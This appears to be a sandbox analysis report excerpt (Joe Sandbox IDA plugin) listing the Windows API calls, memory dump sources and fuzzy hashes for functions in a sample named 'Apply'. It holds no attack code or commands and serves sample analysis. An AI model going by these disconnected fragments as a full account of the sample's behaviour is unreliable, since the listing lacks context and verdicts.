                                                    • _wcslen.LIBCMT ref: 008BD5EA
                                                    • _wcslen.LIBCMT ref: 008BD600
                                                    • SHFileOperationW.SHELL32(?), ref: 008BD646
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 3164238972-1173974218
                                                    • Opcode ID: db386734d6e303e5e6a1224bf3f942215d0873c374c5fa16245540ac04f223db
                                                    • Instruction ID: 556d56afacb32689901e898d330c75653599a2a4af09177f8c37ec8b876225e9
                                                    • Opcode Fuzzy Hash: db386734d6e303e5e6a1224bf3f942215d0873c374c5fa16245540ac04f223db
                                                    • Instruction Fuzzy Hash: 04413271905318AFDF22EBA4C981EDD77B8FF18344F0000E6A549EB251EE34AB88CB51
                                                    APIs
                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 008E35DA
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 008E360D
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 008E3642
                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 008E3674
                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 008E369E
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 008E36AF
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008E36C9
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: fa0b74250c2bea0ef23ecfafbdcb3fcc2faae5cb5f4852de4d1a349120af3d25
                                                    • Instruction ID: 37bc4c2e09589b28dbef80adbb34f05fd2d957ed5effe320b4bb6566099aa6ee
                                                    • Opcode Fuzzy Hash: fa0b74250c2bea0ef23ecfafbdcb3fcc2faae5cb5f4852de4d1a349120af3d25
                                                    • Instruction Fuzzy Hash: 2F310534604294BFDB218F6ADC88F6537A1FB9A720F1501A4F514DF2B2CB71AD85EB41
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 008C0BC3
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008C0BFF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CreateHandlePipe
                                                    • String ID: nul
                                                    • API String ID: 1424370930-2873401336
                                                    • Opcode ID: 87cc9595e1f356ce8336871bc0135c8858986d83198a5bb78f2bb95f6c4a092f
                                                    • Instruction ID: 490f6c63001aaad540f520d726bc7c6dd901ab389c05e0683cc6ec5ecad14fb5
                                                    • Opcode Fuzzy Hash: 87cc9595e1f356ce8336871bc0135c8858986d83198a5bb78f2bb95f6c4a092f
                                                    • Instruction Fuzzy Hash: 4F211774500309EBDB208F68D845F9ABBB4FF447A4F204A1DE9A1DB291E770D9508F50
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 008C0C97
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008C0CD2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CreateHandlePipe
                                                    • String ID: nul
                                                    • API String ID: 1424370930-2873401336
                                                    • Opcode ID: eec8a52b152e8506417810295e8a3da113e18bde46bd78c853664680319e45bd
                                                    • Instruction ID: 1951405681b69e00d86de9ee0543388091e21f7d0299ddedb4a10020c0e69ce3
                                                    • Opcode Fuzzy Hash: eec8a52b152e8506417810295e8a3da113e18bde46bd78c853664680319e45bd
                                                    • Instruction Fuzzy Hash: 32212875500305DBDB209FA98844F9ABBB8FF557A4F200B1DEAB6DB2D0E670E8408F51
                                                    APIs
                                                      • Part of subcall function 008566CB: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00856709
                                                      • Part of subcall function 008566CB: GetStockObject.GDI32(00000011), ref: 0085671D
                                                      • Part of subcall function 008566CB: SendMessageW.USER32(00000000,00000030,00000000), ref: 00856727
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008E48D2
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008E48DF
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008E48EA
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008E48F9
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008E4905
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: d26dc724763769a395754e2962604971b86c862c3deca070580732246ae963d5
                                                    • Instruction ID: c510d7ea6ff79524b051aa518157611c2bc22e2ef8e6e67236c1a45cdaa4ed15
                                                    • Opcode Fuzzy Hash: d26dc724763769a395754e2962604971b86c862c3deca070580732246ae963d5
                                                    • Instruction Fuzzy Hash: 191190B215021DBEEF119F65CC81EEB7F9DFF09758F014110BA08E6161CA729C629BA4
                                                    APIs
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,008946DA,?,?,00000000,00000000), ref: 008C3748
                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008946DA,?,?,00000000,00000000), ref: 008C375F
                                                    • LoadResource.KERNEL32(?,00000000,?,?,008946DA,?,?,00000000,00000000,?,?,?,?,?,?,00855533), ref: 008C376F
                                                    • SizeofResource.KERNEL32(?,00000000,?,?,008946DA,?,?,00000000,00000000,?,?,?,?,?,?,00855533), ref: 008C3780
                                                    • LockResource.KERNEL32(008946DA,?,?,008946DA,?,?,00000000,00000000,?,?,?,?,?,?,00855533,?), ref: 008C378F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                    • String ID: SCRIPT
                                                    • API String ID: 3051347437-3967369404
                                                    • Opcode ID: e38519b6a020aeff9f9868f7c25598094a5d79d1b400d279599b6fdc2db8491c
                                                    • Instruction ID: 15010370b97c7d69ef5eb8f755a8ff0c53502ec3cc72c6a9629dde4b4c154156
                                                    • Opcode Fuzzy Hash: e38519b6a020aeff9f9868f7c25598094a5d79d1b400d279599b6fdc2db8491c
                                                    • Instruction Fuzzy Hash: 3C118EB1200741BFD7218B65DC88F277BB9FFC5B45F14816CB912DA250DB71ED058620
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008BE062
                                                    • LoadStringW.USER32(00000000), ref: 008BE069
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008BE07F
                                                    • LoadStringW.USER32(00000000), ref: 008BE086
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008BE0CA
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 008BE0A7
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 4072794657-3128320259
                                                    • Opcode ID: e909010f50a2911107adac7a2d33cdac96f12a16f77b55db87313041a61c990a
                                                    • Instruction ID: ff19f84812e7272294bb4693a1368296f37dab8e47289992902c217ed6045454
                                                    • Opcode Fuzzy Hash: e909010f50a2911107adac7a2d33cdac96f12a16f77b55db87313041a61c990a
                                                    • Instruction Fuzzy Hash: 830186F690034CBFE720A7A49DC9EE7776CF708304F004591B746E6152EA759E894B71
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(01580450,01580450), ref: 008C104C
                                                    • EnterCriticalSection.KERNEL32(01580430,00000000), ref: 008C105E
                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 008C106C
                                                    • WaitForSingleObject.KERNEL32(?,000003E8), ref: 008C107A
                                                    • CloseHandle.KERNEL32(?), ref: 008C1089
                                                    • InterlockedExchange.KERNEL32(01580450,000001F6), ref: 008C1099
                                                    • LeaveCriticalSection.KERNEL32(01580430), ref: 008C10A0
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: 049a590dd51a91f39e422ec746918f77ec597be6c1e71b6bb94a7ed46435e867
                                                    • Instruction ID: 0ed3df0d98d51bb1e6719145713cf2f17434073be26828ea07db43ef95afb220
                                                    • Opcode Fuzzy Hash: 049a590dd51a91f39e422ec746918f77ec597be6c1e71b6bb94a7ed46435e867
                                                    • Instruction Fuzzy Hash: 93F01932042B42ABD7525B54EECDBD6BB39FF05302F401025F221998A0CB75E4A9CF90
                                                    APIs
                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 008D2547
                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008D2568
                                                    • WSAGetLastError.WSOCK32 ref: 008D2579
                                                    • htons.WSOCK32(?,?,?,?,?), ref: 008D2662
                                                    • inet_ntoa.WSOCK32(?), ref: 008D2613
                                                      • Part of subcall function 008B40D3: _strlen.LIBCMT ref: 008B40DD
                                                      • Part of subcall function 008D39AB: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,008CF393), ref: 008D39C7
                                                    • _strlen.LIBCMT ref: 008D26BC
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                    • String ID:
                                                    • API String ID: 3203458085-0
                                                    • Opcode ID: 9146be5f6b1873fa9a136688051cb20872038bda4a531fe3bcd904aac4c9c04b
                                                    • Instruction ID: f2199364209da2b8ea27841c7af0490b18a0e7977f3beb3615c1046afd0996c5
                                                    • Opcode Fuzzy Hash: 9146be5f6b1873fa9a136688051cb20872038bda4a531fe3bcd904aac4c9c04b
                                                    • Instruction Fuzzy Hash: 33B1D331204340AFC324DF28C895E2A7BA5FFA4318F54865DF45A8B3A2DB71ED45CB92
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 008563ED
                                                    • GetWindowRect.USER32(?,?), ref: 0085642E
                                                    • ScreenToClient.USER32(?,?), ref: 00856456
                                                    • GetClientRect.USER32(?,?), ref: 00856594
                                                    • GetWindowRect.USER32(?,?), ref: 008565B5
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Rect$Client$Window$Screen
                                                    • String ID:
                                                    • API String ID: 1296646539-0
                                                    • Opcode ID: 24bde9a733830a63bca2674915aea30d5890759112ae0561b11190dc09d5de0b
                                                    • Instruction ID: 26ce4f1dfc66bb1071d35d0d5ffb8cfe6f0969a0fd2196b17ddb85d829d13991
                                                    • Opcode Fuzzy Hash: 24bde9a733830a63bca2674915aea30d5890759112ae0561b11190dc09d5de0b
                                                    • Instruction Fuzzy Hash: 6CB16734A00A4ADBDF14DFA8C4807EAB7F1FF58311F54841AE8AAD7250EB34E964DB54
                                                    APIs
                                                    • __allrem.LIBCMT ref: 0088037A
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00880396
                                                    • __allrem.LIBCMT ref: 008803AD
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008803CB
                                                    • __allrem.LIBCMT ref: 008803E2
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00880400
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                    • String ID:
                                                    • API String ID: 1992179935-0
                                                    • Opcode ID: 8cf0651829415527d5c628b1b57484c99734d042a52203334b1857180c4d1198
                                                    • Instruction ID: bc0cd842229fe48db54fbde9e1c8073c50bef9de8ce7bc98587098c1796b8f85
                                                    • Opcode Fuzzy Hash: 8cf0651829415527d5c628b1b57484c99734d042a52203334b1857180c4d1198
                                                    • Instruction Fuzzy Hash: 0981F772A00706ABE765BE6CCC85B6AB3E8FF40724F24412EF511D7691E7B0E9088F55
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00878629,00878629,?,?,?,0088679F,00000001,00000001,8BE85006), ref: 008865A8
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0088679F,00000001,00000001,8BE85006,?,?,?), ref: 0088662E
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00886728
                                                    • __freea.LIBCMT ref: 00886735
                                                      • Part of subcall function 00883B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00876A59,?,0000015D,?,?,?,?,00878590,000000FF,00000000,?,?), ref: 00883BA2
                                                    • __freea.LIBCMT ref: 0088673E
                                                    • __freea.LIBCMT ref: 00886763
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1414292761-0
                                                    • Opcode ID: 7396743fbd467d2503c1db6afd8f05d508ea15c631e7a803a5a884ae2abe804f
                                                    • Instruction ID: 5def35df86d3f7e32152a0c9471f96d0090573648ed4d7be24188af16c6972ed
                                                    • Opcode Fuzzy Hash: 7396743fbd467d2503c1db6afd8f05d508ea15c631e7a803a5a884ae2abe804f
                                                    • Instruction Fuzzy Hash: 1751CFB2600217ABDB25BF64CD85EAB77AAFF54B54B548728F904D6140FB34DC608790
                                                    APIs
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                      • Part of subcall function 008DD11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DBE35,?,?), ref: 008DD13C
                                                      • Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD178
                                                      • Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD1E6
                                                      • Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD21C
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC451
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008DC4AC
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 008DC4F1
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008DC520
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008DC57A
                                                    • RegCloseKey.ADVAPI32(?), ref: 008DC586
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                    • String ID:
                                                    • API String ID: 1120388591-0
                                                    • Opcode ID: 1b72cee311eee18ec184460ed389ccb2fc56dcac6040a22622bf48acc410fe0e
                                                    • Instruction ID: be5283e4e8117be65deffdb8d4cccbbf0d53a204d57cb70f43d7a8b327239205
                                                    • Opcode Fuzzy Hash: 1b72cee311eee18ec184460ed389ccb2fc56dcac6040a22622bf48acc410fe0e
                                                    • Instruction Fuzzy Hash: A4815F31108241AFD714DF24C895E2ABBF5FF84308F548A5DF4598B292DB31ED4ACB92
                                                    APIs
                                                      • Part of subcall function 00853914: _wcslen.LIBCMT ref: 00853919
                                                      • Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A
                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 008C9C54
                                                    • _wcslen.LIBCMT ref: 008C9C75
                                                    • _wcslen.LIBCMT ref: 008C9C9C
                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 008C9CF4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$FileName$OpenSave
                                                    • String ID: X
                                                    • API String ID: 83654149-3081909835
                                                    • Opcode ID: 6bd74f00f4688564a46b2d9d52bc9f6f3d4fd3805480f2f1e2b3cc16fb26268f
                                                    • Instruction ID: bf560ac4c18f7ab16053e5eb520b8dca80b7e34a46bfc96fd8dc2577502d73a7
                                                    • Opcode Fuzzy Hash: 6bd74f00f4688564a46b2d9d52bc9f6f3d4fd3805480f2f1e2b3cc16fb26268f
                                                    • Instruction Fuzzy Hash: 82E15B715083508FC724DF28C895B6AB7E5FF85314F1489ADE889DB2A2DB30DD09CB92
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 008C6C4B
                                                    • CoInitialize.OLE32(00000000), ref: 008C6DA8
                                                    • CoCreateInstance.OLE32(008F0CE0,00000000,00000001,008F0B50,?), ref: 008C6DBF
                                                    • CoUninitialize.OLE32 ref: 008C7043
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                    • String ID: .lnk
                                                    • API String ID: 886957087-24824748
                                                    • Opcode ID: 64830620e41e2706302482f09bf7974ca1b78061f73afaeb562f65bde208bb14
                                                    • Instruction ID: dc692b13d0cecdbebc1544ccd9b8aa7fdafa0ae151c816a5ab0916bf5c97754d
                                                    • Opcode Fuzzy Hash: 64830620e41e2706302482f09bf7974ca1b78061f73afaeb562f65bde208bb14
                                                    • Instruction Fuzzy Hash: 98D105716083019FD314EF28C881E6AB7E8FF84715F40496DF995CB262EB71E949CB92
                                                    APIs
                                                      • Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2
                                                    • BeginPaint.USER32(?,?,?), ref: 00869477
                                                    • GetWindowRect.USER32(?,?), ref: 008694DB
                                                    • ScreenToClient.USER32(?,?), ref: 008694F8
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00869509
                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00869557
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008A77FA
